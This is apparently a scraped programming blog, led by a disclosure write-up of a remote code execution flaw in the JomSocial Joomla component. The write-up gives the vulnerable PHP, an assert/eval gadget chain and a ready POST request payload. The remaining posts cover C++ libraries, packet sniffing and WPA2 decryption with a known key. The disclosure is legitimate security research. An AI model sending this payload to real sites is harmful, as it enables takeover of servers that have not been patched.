Average coder

Exploiting a code execution in JomSocial < 3.1.0.4

2014-01-30T21:10:00.000-03:00

Update, February 4th: JomSocial has just released a patch for this vulnerability. We contacted them a month after the initial contact and they said that the issue had been fixed in the 3.1.0.1 release. The demo hosted on their site was no longer vulnerable(it still was in the first days of January), so we thought that the issue was indeed fixed. but unfortunately, it wasn't.

Yesterday, Gaston Traberg and I released an advisory regarding a remote code execution vulnerability in the Joomla! JomSocial component, which affected all versions >= 2.6 and < 3.1.0.1. I don't usually like to write about the security vulnerabilities that I find and report, but this one was quite interesting to exploit.

Note that we found this vulnerability by picking random, widespread, Joomla! components and auditing them. This was not a vulnerability found while trying to "hack into" a website. As soon as we found it, it was reported to the vendors.

JomSocial

JomSocial is a component which turns your Joomla! installation into a Facebook-like social network. You've got photos, videos, walls, comments, etc. A lot of its code relies on ajax calls which build the HTML on the server side and gets rendered by the client's browser.

Even though it is not a free product, its PHP code is licensed under GPLv2.

Azrul system plugin

JomSocial relies on a plugin called "Azrul system" which has a module that automatically parses parameters and calls the appropriate function with the specified parameters. This is nice because developers don't have to explicitly parse them and dispatch to the right function; that's done transparently.

Requests that will be parsed by this system contain parameters that look like this:

  option=community&
  no_html=1&
  task=azrul_ajax&
  func=MODULE,FUNCTION&
  TOKEN=1&
  arg2=["_d_","PARAM1"]&
  arg3=["_d_","PARAM2"]&
  arg...

Where:

MODULE is the class that will handle the request. These classes have to be located in a specific directory, otherwise the request will fail.
FUNCTION is the function defined in class MODULE that will be executed.
TOKEN is an anti-CSRF token that the application assigns to each different session.
PARAM* indicates the contents of each parameter. As you can see, every parameter is a JSON-encoded string.

So for example, this call:

  option=community&
  no_html=1&
  task=azrul_ajax&
  func=Foo,Bar&
  baz=1&
  arg2=["_d_","Hello"]&
  arg3=["_d_","World!"]

Would automatically call this function(as long as its defined in the right directory):

class Foo {
  function Bar($str1, $str2) {
     echo "$str1 $str2"; // would echo Hello World!
  }
}

The vulnerability

So, while we were searching for calls to the common insecure functions, such as eval, system, passthru, etc. we came by a call to the PHP call_user_func_array function. This call was performed in the CommunityPhotosController::ajaxUploadAvatar member function, and it looked like this:

// not relevant code has been removed
public function ajaxUploadAvatar($type, $id, $custom = '') {
  $aCustom = json_decode($custom, true);
  $cTable = JTable::getInstance(ucfirst($type), 'CTable');
  $cTable->load($id);
  if (isset($aCustom['call'])) {
    if (isset($aCustom['call'][0]) && isset($aCustom['call'][1])) {
      $obj = $aCustom['call'][0];
      $method = $aCustom['call'][1];
      $params = count($aCustom['call']) > 2 ? array_slice($aCustom['call'], 2) : array();
      if (!empty($obj) && !empty($method)) {
        $customHTML = call_user_func_array(array($obj, $method), $params);
      }
    }
  }
}

So as you can see, the function does the following:

Loads an object representing a database table with the name $type and loads the record with id $id.
JSON-decodes its third parameter.
If there is a "call" key in the JSON-decoded string, it assumes the value for that key will be an array, and tests to see if there are at least 2 elements in it.
The first element of that array will indicate the name of an object or class and the second one, a name of a method, apparently.
The rest of the parameters will be parameters for that method.
Finally, if everything went well, it calls call_user_func_array using the provided data.

This already looks pretty insecure. We can basically indicate any class name, method and parameters, and we'll be able to execute it. All that's left now is to find a class function that allows us to do interesting stuff, like executing arbitrary PHP code.

Exploiting it

We started searching for calls to more severe functions that would give us complete control over the application, such as eval or system. Of course, we can't call them directly, since we need to call methods defined inside a class, and those are free functions.

At that point, we found a method, _runCommand defined in the CVideos class. It's not a static one, meaning that we should need an instance of an object to call it(at least in theory), but apparently PHP allowed us to do so. Unfortunately, before making a call to system, this function accessed $this, and since there was no $this here(since there's no instance associated with the call), that would trigger a fatal PHP error.

So we kept on looking and found a very interesting function, CStringHelper::escape which looks like this:

static function escape($var, $function='htmlspecialchars')
{
   // four unrelevant lines removed here
   return call_user_func($function, $var);
}

As you can see, it uses call_user_func using the second parameter as the name of the function to call, and the first parameter as its argument. So that's it, if we managed to call this function and provide a non-class function name(such as eval) and some PHP code, we should be able to get it to execute on the server.

Not so fast

Unfortunately, it seems like, since PHP's eval function is actually a language construct rather than a real function, you can't call it this way. For example, if you call it through call_user_func, like this:

<?php
  call_user_func("eval", "echo 'Hello world';");
?>

You'll get an error like the following one:

PHP Warning: call_user_func() expects parameter 1 to be a valid callback, function 'eval' not found or invalid function name in test.php on line 2

So that doesn't work. Of course we can already call system, shell_exec, passthru, etc. but it's always better to be able to execute PHP code, since it's common for those functions to be disabled. We needed a way to execute arbitrary code that didn't require the use of eval, or at least not directly...

There's another function, assert which has some common behavior with eval: it evaluates its parameter as PHP code and stops the execution unless the evaluated expression returns a true boolean value. Using this function we can do something like this:

<?php
  assert("eval('echo 123;');");
?>

Which looks strange but does execute the echo. Unfortunately, since eval always returns NULL unless you're using return statement in the eval'd code, this will always generate a warning, since NULL is implicitly converted to false, making the assertion fail.

We could stop now, since we already reached PHP code execution, but it's better if our exploit doesn't leave traces in logs as well. Moreover, our PHP code has to be composed of only one expression, since the following code:

<?php
  assert("eval('echo 123;'); eval('echo 456;');");
?>

Will only print "123", as the assertion fails before the second eval is executed.

So what we need is a way to execute an arbitrary piece of code which consists of only one expression, doesn't generate any warnings and always returns true.

Actually, we could make it never return as well, right? We could call exit inside the expression, which will stop the execution before the assertion fails. exit takes a parameter, so we could nest another function call as its parameter. Something like this:

assert("exit(foo());");

What if the nested function was eval? We'd already be able to execute arbitrary code! So doing this should work:

assert("exit(eval('echo 123'));");

In the end, what we came up with was the following:

<?php
  assert("@exit(@eval(@base64_decode('BASE64_ENCODED_SCRIPT')))");
?>

The extra base64 encoding was used so that we didn't even need to encode quotes, or any other character that could cause troubles. Note that the extra "@" characters force the PHP interpreter to supress any error messages that might be generated while executing our code.

Putting it all together

Now that we know how to execute any piece of PHP code, we need to build a request that does so. In order to do that, we need:

A valid anti-CSRF token. We can find that token by making any request and analyzing the output. There will be a hidden input, whose name is a 32 long hex-characters string and its value will be 1. The name of the input is the token.
A valid table name, so that JTable::getInstance returns a valid object. Otherwise, when later calling JTable::load will trigger an error. In this case, we'll use the table "Events".
Since JTable::load doesn't throw an exception when there is no record with the given id, we can use any number. Besides, the retrieved record is not used before the call to call_user_func_array.
We need to base64 encode the PHP code, and insert it inside our payload.
Finally, we need to build an associative array which has a key "call" which maps to a list which contains the name of the class we'll use(CStringHelper), the name of the method to call(escape), , the payload generated in the previous step and the string "assert".

The complete request would look like the following:

POST /index.php HTTP/1.0
Host: example.com
...

option=community&
no_html=1&
task=azrul_ajax&
func=photos,ajaxUploadAvatar&
TOKEN=1&
arg2=["_d_","Event"]&
arg3=["_d_","374"]&
arg4=["_d_","%7B%22call%22%3A%5B%22CStringHelper%22%2C%22escape%22%2C%20%22%40exit%28%40eval%28%40base64_decode%28%27ZWNobyAnSGVsbG8gV29ybGQnOw%3D%3D%27%29%29%29%3B%22%2C%22assert%22%5D%7D"]

The decoded payload(it's just an echo) looks like this:

{
  "call" : [
    "CStringHelper",
    "escape", 
    "@exit(@eval(@base64_decode('ZWNobyAnSGVsbG8gV29ybGQnOw==')));",
    "assert"
  ]
}

Our code should be executed after that, so all that's left is to parse the output. I have uploaded a working python exploit to my github account.

Creating a simple and fast packet sniffer in C++

2013-10-26T12:41:00.001-03:00

I have seen several articles on the web about writing packet sniffers using C and C++ which suggest using raw sockets and dealing with protocol headers and endianness yourself. This is not only very tedious but also there are libraries which already deal with that for you and make it extremely easy to work with network packets.

One of them is libtins, a library I have been actively developing for the past few years. It has support for several protocols, including Ethernet, IP, IPv6, TCP, UDP, DHCP, DNS and IEEE 802.11, and it works on GNU/Linux, Windows, OSX and FreeBSD. It even works on different architectures such as ARM and MIPS, so you could go ahead and develop some application which could be executed inside routers and other devices.

Let's see how you would sniff some TCP packets and print their source and destination port and addresses:

#include <iostream>
#include <tins/tins.h>

using namespace std;
using namespace Tins;

bool callback(const PDU &pdu) {
    const IP &ip = pdu.rfind_pdu<IP>();
    const TCP &tcp = pdu.rfind_pdu<TCP>();
    cout << ip.src_addr() << ':' << tcp.sport() << " -> " 
         << ip.dst_addr() << ':' << tcp.dport() << endl;
    return true;
}

int main() {
    // Sniff on interface eth0
    Sniffer sniffer("eth0");
    sniffer.sniff_loop(callback);
}

This is the output I get when executing it:

As you can see, it's fairly simple. Let's go through the snippet and see what it's doing:

The callback function is the one that libtins will call for us each time a new packet is sniffed. It returns a boolean, whch indicates whether sniffing should go on or not, and takes a parameter of type PDU, which will hold the sniffed packet. This library represents packets as a series of Protocol Data Units(PDU) stacked over each other. So in this case, every packet would contain an EthernetII, IP and TCP PDUs.
Inside callback's body, you can see that we're calling PDU::rfind_pdu. This is a member function template which looks for the provided PDU type inside the packet, and returns a reference to it. So in the first two lines we're retrieving the IP and TCP layers, and then we're simply printing the addresses and ports.
Finally, in main an object of type Sniffer is constructed. When constructing it, we indicate that we want to sniff on interface eth0. After that, Sniffer::sniff_loop is called, which will start sniffing packets and calling our callback for each of them.

Note that this example will run successfully on any of the supported operating systems(as long as you use the right interface name, of course). The endianness of each of the printed fields is handled internally by the library, so you don't even have to worry about making your code work in Big Endian architectures.

Now, you may be wondering whether using libtins will make your code significantly slower. If that is your concern, then you should not worry about it at all! This library was designed keeping efficiency in mind at all times. As a consequence it's the fastest packet sniffing and interpretation library I've tried out (note that I tried several, such as scapy, dpkt, impacket and libcrafter). Go ahead and have a look at these benchmarks to see how fast it actually works.

libtins allows you to implement fast packet sniffers in very few lines of code. It also supports additional features like reassembling and following TCP streams, decrypting WPA2 traffic (both TKIP and AES) and defragmenting IP datagrams.

If you want to learn more about libtins, please visit this tutorial, which covers everything you should know before starting to develop your network sniffing application!

Decrypting WEP/WPA2 traffic on the fly

2013-06-04T23:42:00.003-03:00

This is the first application I've developed using libtins, a packet crafting and sniffing library I've been developing for a while. In the latest release of that library, I've added support for WPA2 decryption, so this application does very few things and does not handle encription at all; the library does so.

The decryption of WEP and WPA2 traffic has been available for a while now. Applications such as wireshark, tshark and airdecap have supported this for quite some time. However, after adding this decryption feature to libtins, I wondered why there were no applications that let you decrypt the traffic directly from a network interface and make it available, decrypted, for any other application. This is where dot11decrypt was born.

Objective

The application sniffs a network interface looking for WEP and WPA2 encrypted traffic. It also analyzes EAPOL(802.1X) handshakes in order to track the nonces shared by peers, which will later be necessary while decrypting WPA2.

Once a packet is decrypted successfully, the 802.11 frame is replaced by an Ethernet header, and the whole packet is written to a tap interface. You now can read those decrypted packets using any other tool, such as Wireshark or ngrep, and perform any kind of analysis.

What is required for decryption

dot11decrypt does not crack any of the above mentioned encryption algorithms. So if you're looking for a wireless cracking tool, then this is not one of them.

In order to crack WEP encrypted traffic, you need to provide the access point's BSSID and the WEP key. The syntax required to indicate that decryption data is the following:

wep:[BSSID]:[KEY]

For example:

wep:00:01:02:03:04:05:mypassword

Indicates that the access point whose BSSID is "00:01:02:03:04:05" uses WEP encryption and the WEP key is "mypassword".

On the other hand, WPA2 traffic is a little bit more complex. In order to generate the first set of keys required to decrypt the traffic(the Pairwise Master Key or PMK), both the pre-shared key and the network SSID(you network's "name") are required.

In order to specify both of this attributes, the following syntax is used:

wpa:[SSID]:[PSK]

As an example:

wpa:MyAccessPoint:MySecretKey

Indicates that any access point which broadcast the SSID "MyAccessPoint" will be decrypted, assuming the PSK is "MySecretKey".

How it works

Decrypting WEP frames is fairly simple, given the WEP key, it's just using RC4 over the encrypted data.

Decrypting WPA2, however, is a little bit trickier. In order to decrypt a WPA2 encrypted frame, the following is required:

The PMK(mentioned a few lines above).
The association SSID -> BSSID.
A valid 4-way handshake between the client which sends or is about to receive that frame.

The application initially computes the PMK. Since you only provide the network SSID, then the application will look for beacon frames so as to know which BSSID is broadcasting the given SSID.

After that, when a client performs a handshake against those BSSIDs, a Pairwise Transient Key(PTK) is computed and stored. At that point, any packet sent from or to the associated client will be decrypted using that PTK. If any client is deauthenticated and then authenticated again, that new handshake will be taken into account and used to decrypt its packets.

Luckily for us, all of the above mentioned is already implemented and performed automatically by libtins: inspecting beacon frames looking for the SSID, capturing 4-way handshakes and decrypting the traffic. If you want to have a look at that code, have a look at the WPA2Decrypter class.

Note that WPA2 decryption works for both AES(CCMP) and TKIP encrypted frames, so this works for WPA as well(since this uses TKIP).

Compiling the application

In order to compile dot11decrypt, the latest version of libtins is required(version 1.1 at the moment of writing). You can download it from the project's github entry. The library must be compiled using support for WPA2 decryption(this is enabled by default).

Since the application uses some C++11 features, a fairly recent C++ compiler is needed as well. g++ 4.6 is enough. g++ 4.5 might do.

dot11decrypt's source code can be downloaded from github. After you've got these, just go ahead and do the usual:

./configure
make

Using it

The application takes as its first argument, the interface in which to listen for packets. This must be a wireless interface in monitor mode. The rest of the arguments specify the data which will be used to decrypt the data, using the syntax mentioned near the beginning of this post:

./dot11decrypt wlan0 wpa:MyAccessPoint:some_password
./dot11decrypt mon0 wep:00:01:02:03:04:05:blahbleehh

After running it, you'll get an output similar to the following:

Using device: tap0
Device is up.

The tap0 interface will now be used to output the decrypted traffic. tcpdump or any other network sniffing tool can be used to process the data. Note that the 802.11(and possibly the RadioTap encapsulation used) and LLC+SNAP frames will be removed and replaced by an Ethernet header.

Note that you require either root privileges or the CAP_NET_ADMIN capability on the executable to run this application successfully.

Example

In this example, I'm going to sniff and decrypt the traffic sent from my phone.

The mon0 interface, the one I'll be using, is in monitor mode. This is the output of running tcpdump on that interface, filtering only IEEE 802.11 data frames for which the second address in that frame is the access point's BSSID:

As you can see, there are several Dot11 QoS Data frames, all of them encrypted.

Now, I'm going to execute dot11decrypt providing the SSID and the WPA2 PSK:

A new tap interface has been created, named tap0. Every decrypted packet will be written to it.

At this point, I connected my phone to the access point. The application captures the 802.1X handshake and it will start decrypting the traffic. In the image below, you can see how the traffic sniffed from the tap0 interface is no longed encrypted:

I hope you find this application useful!

libtins v0.2 released

2012-10-21T10:40:00.000-03:00

After coding and testing libtins a lot in the past months, we're proud to announce the release of the 0.2 version. libtins is a network packet crafting and sniffing library. It allows you to forge packets with very little effort, forgetting about each protocol data unit's endianness, internal representation, etc.

In this release, there have been several changes:

IP and hardware addresses can now be handled easily. Instead of using pointers or integral values to represent them, there's now a class which abstract each of them, making it easy to create them from their string representations, and compare them. You can now use hardware addresses as keys inside std::maps, or insert them in std::sets.
Added support for big endian architectures. We've worked hard to make sure every getter, setter and function available handles endianness correctly. Now you can create tools and run them on both little and big endian architectures, without worrying about it.
Generalized and simplified some interfaces. The Sniffer class required you to inherit a class from an AbstractSnifferHandler just to perform a call to Sniffer::sniff_loop. Now this function takes a template functor argument and calls it every time a new packet is sniffed off the wire, making your life a lot easier.
Network interfaces used to be handled internally by each PDU. Classes would usually take a std::string, look up the corresponding interface index and store it, and also provide overloads that took directly the integral index. Now there's a NetworkInterface class which does this job internally. So PDUs now take objects of this type rather than providing several overloads(which in cases like the Dot11 class hierarchy, reduces the boilerplate code significantly).
You can now follow TCP streams on the fly. There's a TCPStreamFollower class that sniffs packets(either from a network interface or a pcap file), and reassembles TCP streams, executing a callback whenever there's data available.
We're planning to allow decrypting any 802.11 encrypted data frame on the fly. In this release, by providing tuples (bssid, password), you can decrypt WEP-encrypted frames while sniffing, in a completely transparent way. I'll soon add an example in the libtins website on how to do that.
We've added support for some new PDUs: Null/Loopback, IEEE 802.3, LLC and DNS.
You can now read and write pcap files, using a very simple interface.
Finally, there's been a huge refactoring on the entire code. Code has been RAII'd a lot. There are less pointers moving around, more automatic storage objects and references.

In case you want to try the library out, please visit its website and download the latest version.

Compile time MD5 using constexpr

2012-08-30T22:11:00.000-03:00

Today, someone on stackoverflow asked how to perform compile-time hashing in C++. After providing a small, naive, example in my answer, I thought it would actually be interesting to implement some well known hashing algorithm using C++11 features, such as constexpr. So I gave MD5 a try, and after some hours of trying stuff, I was able to create compile-time MD5 hashes.

The MD5 hashing algorithm.

Implementing the algorithm itself was not as hard as I thought it would be. The algorithm is roughly like this:

It starts with 4 32-bits integers which contain a predefined value.
The algorithm contains 4 "rounds". On each of them, a different function is applied to those integers and the input string.
The result of those rounds serves as input to the next ones.
Add the 4 resulting 32-bit integers with the original, predefined integer values.
Interpret the resulting integers as a chunk of 16 bytes.

That's it. Note that I've somehow stripped down the algorithm to short strings. A real implementation would iterate several times doing the same stuff on the entire buffer. But since nobody is going to hash large strings on compile time, I've simplified the algorithm a little bit.

The implementation

So basically the implementation was not that hard, some template metaprogramming and several constexpr functions. Since there was a pattern on the way the arguments were provided as input to the functions in each round, I used a specialization which avoided lots of repeated code.

The worst part was generating the input for that algorithm. The input is not just the string which is to be hashed. The steps to generate that input is roughly as follows:

Create a buffer of 64 bytes, filled with zeros.
Copy the input string into the start of the buffer.
Add a 0x80 character on buffer[size_of_input_string].
On buffer[56], the value sizeof_input_string * 8 must be stored.

That's all. The algorithm will only work with strings of no more than 31 bytes. It could be generalized by modifying the appropriate bytes on buffer[57:60], but that was not my objective.

In order to achieve this buffer initialization, I had to somehow decompose the input string into characters, and then join them and those special bytes, into an array which could be used during compile time. In order to achieve this, I implemented a constexpr_array, which is just a wrapper to a built-in array, but provides a data() constexpr member, something that std::array does not have(I'm not really sure why):

template<typename T, size_t n>
struct constexpr_array {
    const T array[n];
    
    constexpr const T *data() const {
        return array;
    }
};

The decomposition ended up pretty simple, but I had to struggle to figure out how the hell to implement it.

Finally, the interface for the compile time MD5 would be the following:

template<size_t n> constexpr md5_type md5(const char (&data)[n])

The typedef for the function's result is the following:

typedef std::array<char, 16> md5_type;

Note that everything in the implementation resides in namespace ConstexprHashes.

As an example, this code generates a hash and prints it:

#include <iostream>
#include "md5.h"

int main() {
    constexpr auto value = ConstexprHashes::md5("constexpr rulz");
   
    std::cout << std::hex;
    for(auto v : value) {
        if(((size_t)v & 0xff) < 0x10)
            std::cout << '0';
        std::cout << ((size_t)v & 0xff);
    }
    std::cout << std::endl;
}

This prints out: "b8b4e2be16d2b11a5902b80f9c0fe6d6", which is the right hash for "constexpr rulz".

Unluckily, the only compiler that is able to compile this is clang 3.1(I haven't tested it on newer versions). GCC doesn't like the code, and believes some constexpr stuff is actually non-constexpr. I'm not 100% sure that clang is the one that's right, but it looks like it is.

You can find the MD5 implementation here. Maybe I'll implement SHA1 soon, whenever I have some time.

Well, this was the first time I used constexpr, it was a nice experience. Implementing this using only TMP would be an extreme pain in the ass.

small integer C++ wrapper

2012-08-22T00:01:00.000-03:00

Currently, I'm working on libtins, a library I'm developing with a friend. This library mainly contains classes that abstract PDUs, among other stuff.

Since PDU classes are basically a wrapper over the protocol data units handled by the operating system, getters and setters are provided to enable the user to modify the fields in them. For example, there is a TCP::data_offset method which takes a value of type uint8_t and stores it in the TCP header's data offset field, which is 4 bit wide.

While developing test units for this library, I would use some random number to initialize those fields, and then use the corresponding getter to check that the same number came out of it. A problem that I faced several times is that, there is no way to indicate that, while a setter method takes an uint8_t, the field being set internally is actually 4 bits wide, so any value larger than 15 would overflow, leading to the wrong number being stored. We really want to be able to detect those ugly errors.

One solution would be to, on each setter, check whether the provided value is larger to 2 ** n - 1, where n is the width of the field being set, and raise an exception if this condition is true. This has the drawback that every setter should make the appropriate check, using the appropriate power of 2, and throwing the same exception on each of them. This boilerplate solution already looks nasty.

So I came with a better solution. C++'s implicit conversions can do magic for us. All we need is a class that wraps a value of an arbitrary bit width(up to 64 bits) that performs the corresponding checks while being initialized.

The wrapper class is called small_uint(I thought about providing support for signed integral types, but finally dropped that option. It'd be easy to implement though). The class declaration is this one:

template<size_t n> class small_uint;

The template non-type parameter n indicates the length, in bits, of the field. This class should be optimal, meaning that it should use to smallest integral type that can hold a value of that width.

Internally, a compile time switch is performed to check which is the best underlying type, meaning, the type in which storing the field wastes less space. For example, for 7 bit small_uints, a uint8_t is used, while 11 bit fields will be stored in a member variable of type uint16_t. This underlying type is typedef'ed as the repr_type.

There is a constructor which takes a repr_type and raises an exception if it is larger than the 2 ** n - 1, and a user-defined conversion to repr_type which simply returns the stored value. Since no arithmetic operations are performed with these integers, there are no such operators defined. It don't really know if defining them would make sense. If you wanted to perform such operations, you would just use standard arithmetic types. Only operator== and operator!= have been defined.

I haven't used this class in libtins yet, but setters would probably look like this:

void TCP::data_offset(small_uint<4> value) {
     tcp_header_.data_offset = value;
}

That way, a nice and clean solution can be achieved, avoiding boiler plate code. Note that internally, C++11 features could make a lot of things easier(such as std::numeric_limits<>::max() being constexpr, std::conditional, and constexpr functions), but I wanted to use only C++03 stuff, since the library is intended to work with the latter standard.

The small_uint implementation can be found here.

Python style range loops in C++

2012-07-02T18:52:00.000-03:00

Python is a nice scripting language which has some really flexible characteristics. One thing I like about it is the integer range for-loops that can be achieved using the built-in function range:

for i in range(10):
    # Insert clever statement below 
    print i

Doing that same thing in C++ would require some for loop like the one below:

for(size_t i(0); i < 10; ++i)
    std::cout << i << std::endl;

Which is larger and less clearer(well, not that much :D). So I created a simple wrapper to achieve the same thing in C++, using C++11's range-based for loops. The wrapper can be found here.

In order to use ranges, a function named range should be used, which contains these overloads:

// Returns a range_wrapper<T> containing the range [start, end)
template<class T>
range_wrapper<T> range(const T &start, const T &end) {
    return {start, end};
}

// Returns a range_wrapper<T> containing the range [T(), end)
template<class T>
range_wrapper<T> range(const T &end) {
    return {T(), end};
}

range_wrapper<> is a simple wrapper that defines begin() and end(), both return a range_iterator, the former one pointing to the beginning of the range and the latter to the end. The range_iterator<> class template is just a wrapper over the template parameter, and defines all of the forward iterator required member functions/typedefs. The prefix/suffix increment operators apply the same operator on the wrapped object, while the dereference operator returns it.

Since range-based for loops require the iterated sequence to define begin() and end() or that the global std::begin()/end() functions are defined for the given type, using the range_wrapper<> class template in these for loops is perfectly valid.

Using this wrapper, that code can be reduced to this:

// Prints numbers in range [0, 10) 
for(auto item : range(10))
    std::cout << item << std::endl;

Using the first overload, which takes the start and end of the range, we can indicate the starting number.

// Prints numbers in range [5, 15) 
for(auto item : range(5, 15))
    std::cout << item << std::endl;

Note that range is a template function, so it could be adapted to perform range iteration through other types(std::string comes to my mind right now).

This same thing can be achieved using boost::irange, but hey, I was bored and wanted to implement it myself.

Python wrapper in C++11

2012-04-06T01:51:00.000-03:00

This is a post about a wrapper for python scripts I developed using C++11. This was the first time I used variadic templates, and i must say it's an amazing feature in this new C++ standard! It's great to have a type-safe way to use variable arguments.

The whole wrapper is inside the Python namespace. Before you start using anything inside it, you should call Python::initialize(), which initializes the Python API.

The Python::Object class provides an abstraction of a python object. Python::Objects wrap a PyObject*(which is the abstraction of a Python object provided by its API), inside a std::shared_ptr. On their destructor, a call to Py_DECREF is performed, so the underlying PyObject* will get free'd appropriately.

In order to load a python script, a static method Python::Object::from_script(const std::string &) should be called, which returns a Python::Object that represents that script. The name of the script(with or without the ".py" extension) should be passed as argument:

#include "pywrapper.h"

/* ... */

Python::Object script = Python::Object::from_script("test.py"); //could be test also

After that sentence, the "script" variable will have loaded the "test.py" script, located in the current working directory.

Now you can call functions defined in that script using the Python::Object::call_function method, which has this signatures:

 

// Variadic template arguments version
template<typename... Args>
Python::Object call_function(const std::string &name, const Args... &args);
 
// No arguments version
Python::Object call_function(const std::string &name);

This method takes the name of the function as the first argument, followed by 0 or more arguments. These arguments will be implicitly converted to PyObject pointers, which can be used as arguments using the Python API. So far, you can use arguments of these types:

std::string
const char *
Any integral type(for which std::is_integral is true).
bool
double
std::vector
std::list
std::map

Both std::vector and std::list will be converted to a Python list, with the exception of std::vector<char>, which will be converted to a bytearray. The std::map objects will be converted to Python dicts.

The Script::call_function method returns the Python return value wrapped in a Python::Object. Note that the objects stored in the std::vectors and std::lists must also be convertible to PyObject pointers(must be listed above).

In case you want to use the return value, you might want to use Python::Object::convert which will convert the wrapped PyObject* into one of the same C++ types mentioned above, and also std::tuple.

As an example, i used this python script:

 #!/usr/bin/python

def foo(a, b, c, d, e):
    print '{0} - {1} - {2} - {3} - {4}'.format(
        a, str(b), str(c), repr(d), repr(e)
    )

def int_fun():
    return 12

def list_fun():
    return [1,2,3,4,561,2]
    
def dict_fun():
    return {
        'bar' : 1,
        'foo' : 15
    }

def tuple_fun():
    return (1, 'foo', 15.5)

def bool_fun():
    return False

x = 1598

It's just a bunch of functions that take/return different types of arguments. My C++ code that calls these functions is this one:

#include <string>
#include <vector>
#include <iostream>
#include <stdexcept>
#include <iomanip>
#include <map>
#include <tuple>
#include "pywrapper.h"

int main() {
    Python::initialize();
    Python::Object script(Python::Object::from_script("test_script.py"));
    std::vector<int> v({2,6,5});
    std::map<std::string, int> dict({
        {"bleh", 1},
        {"foofoo", 10}
    });
    std::cout << "Calling foo:\n";
    script.call_function("foo", "a string", true, 10, v, dict);
    
    // Int test
    std::cout << "Calling int_fun:\n";
    Python::Object ptr = script.call_function("int_fun");
    int num;
    if(ptr.convert(num))
        std::cout << "Result: " << num << '\n';
    else
        std::cout << "Long conversion failed\n";
    
    // List test
    std::vector<int> lst;
    std::cout << "Calling list_fun:\n";
    ptr = script.call_function("list_fun");
    if(ptr.convert(lst)) {
        std::cout << "List size: " << lst.size() << '\n';
        for(auto it(lst.begin()); it != lst.end(); ++it)
            std::cout << *it << " ";
        std::cout << '\n';
    }
    else
        std::cout << "List conversion failed\n";
    
    // Dict test
    std::map<std::string, int> mp;
    std::cout << "Calling dict_fun:\n";
    ptr = script.call_function("dict_fun");
    if(ptr.convert(mp)) {
        std::cout << "Map size: " << mp.size() << '\n';
        for(auto it(mp.begin()); it != mp.end(); ++it)
            std::cout << it->first << " -> " << it->second << '\n';
    }
    else
        std::cout << "Map conversion failed\n";
        
    // Tuple test
    std::cout << "Calling tuple_fun:\n";
    ptr = script.call_function("tuple_fun");
    std::tuple<int, std::string, double> tup;
    if(ptr.convert(tup)) {
        std::cout << std::get<0>(tup) << "\n";
        std::cout << std::get<1>(tup) << "\n";
        std::cout << std::get<2>(tup) << "\n";
    }
    else
        std::cout << "Tuple conversion failed\n";
    
    bool bool_val;
    std::cout << "Calling bool_fun:\n";
    ptr = script.call_function("bool_fun");
    if(ptr.convert(bool_val))
        std::cout << "Result: " << std::boolalpha << bool_val << '\n';
    else
        std::cout << "Long conversion failed\n";
    
    // Get attr test
    std::cout << "Retrieving 'x' variable:\n";
    try {
        ptr = script.get_attr("x");
        if(ptr.convert(num))
            std::cout << "X == " << num << '\n';
    } catch(std::runtime_error &ex) {
        std::cout << ex.what() << '\n';
    }
    
}

In the last code senteces, the Python::Object::get_attr method is used, which returns a Python::Object containing the contents of the script attribute which has this method argument's name. After executing this application, this output is produced:

Calling foo:
a string - True - 10 - [2, 6, 5] - {'bleh': 1, 'foofoo': 10}
Calling int_fun:
Result: 12
Calling list_fun:
List size: 6
1 2 3 4 561 2
Calling dict_fun:
Map size: 2
bar -> 1
foo -> 15
Calling tuple_fun:
1
foo
15.5
Calling bool_fun:
Result: false
Retrieving 'x' variable:
X == 1598

As you can see, this class allows a type-safe variable argument interface for calling Python functions and retrieving defined attributes in scripts.

You can get the header and source file here.

In order to compile this application, using gcc, remember to use the -std=c++0x and -lpython2.7 arguments.

I hope you find this wrapper useful!

Configuration file parser - C++

2012-03-03T11:20:00.000-03:00

I'm working on a project developed in C++, which can be configured using several parameters on runtime. Since there were lots of options, i decided to include a configuration file in which the user could assign a value to each defined attribute. This is an example of the file's structure:

 


# Default yasps configuration
# By default the server is bound to 0.0.0.0:7517
# --------------------------------------------------
# Server configuration
bind_address=0.0.0.0
port=7517

# Authentication configuration
# Unauthenticated connections are allowed by default
noauth=1
username=user
password=pass123

As you can see, the options require different data types. Therefore, i needed a generic algorithm that could parse the file and interpret the given values as strings, integer, bools or whatever data type i indicated, and assign them to the corresponding attribute. To achieve this, i created a small class using template parameters.

The ConfigurationParser is extremely simple to use. There is one method which adds an attribute and associates it with a pointer. Whenever that attribute name is found on the file, the parser will try to interpret the given value and store it in that pointer. The method has the following signature:

template<class T>

void add_option(const std::string &name, T *value_ptr);

The only constraint imposed on the type T is that the input operator(operator>>) is defined. As long as you use either primitive types or std::string(s), you don't have to implement anything else. In case you have created a certain class that can be deserialized, you would have to implement this operator.

Once every attribute has been set, you have to call the ConfigurationParser::parse method, using the configuration file name as the argument. This is the signature of this method:

void parse(const std::string &file_name);

This method can raise different exceptions, depending on what problem was encountered:

std::ios_base::failure if an error occurred when opening the file.
ConfigurationParser::NoValueGivenError if no value was set for an attribute that appeared on the configuration file. e.g. bleh= . There should be some value after the '=' character.
ConfigurationParser::InvalidValueError if there was a data type missmatch when trying to interpret an attribute's value. This can happen if, for example, an attribute expects an integer value, however, a string value is given.
ConfigurationParser::InvalidOptionError is raised if an attribute which was not registered using ConfigurationParser::add_option appeared in the configuration file.

No that the ConfigurationParser class is included inside the CPPUtils namespace. Finally, here is an example, taken from the project i'm working on:


#include <iostream>
#include <string>
#include "configparser.h" 

using CPPUtils::ConfigurationParser;

class Configuration {
public:
    void load(const std::string &file_name) {
        ConfigurationParser parser;
        parser.add_option("username", &config_username);
        parser.add_option("password", &config_password);
        parser.add_option("bind_address", &address);
        parser.add_option("log_file", &log_filename);
        parser.add_option("port", &port);
        parser.add_option("noauth", &config_allow_no_auth);
        parser.add_option("enable_logging", &config_enable_logging);
        try {
            parser.parse(file_name);
        }
        catch(std::ios_base::failure &ex) {
            std::cerr << "[ERROR] Error opening " << file_name << "(" << ex.what() << ").\n";
        }
        catch(ConfigurationParser::NoValueGivenError &ex) {
            std::cerr << "[ERROR] Parse error: No value give for " << ex.what() << " attribute.\n";
        }
        catch(ConfigurationParser::InvalidValueError &ex) {
            std::cerr << "[ERROR] Parse error: Invalid value for attribute " << ex.what() << "\n";
        }
        catch(ConfigurationParser::InvalidOptionError &ex) {
            std::cerr << "[ERROR] Parse error: Could not find a valid attribute in \"" << ex.what() << "\"\n";;
        }
    }
private:
    std::string config_username, config_password, address, log_filename;
    short port;
    bool config_allow_no_auth, config_enable_logging;
};

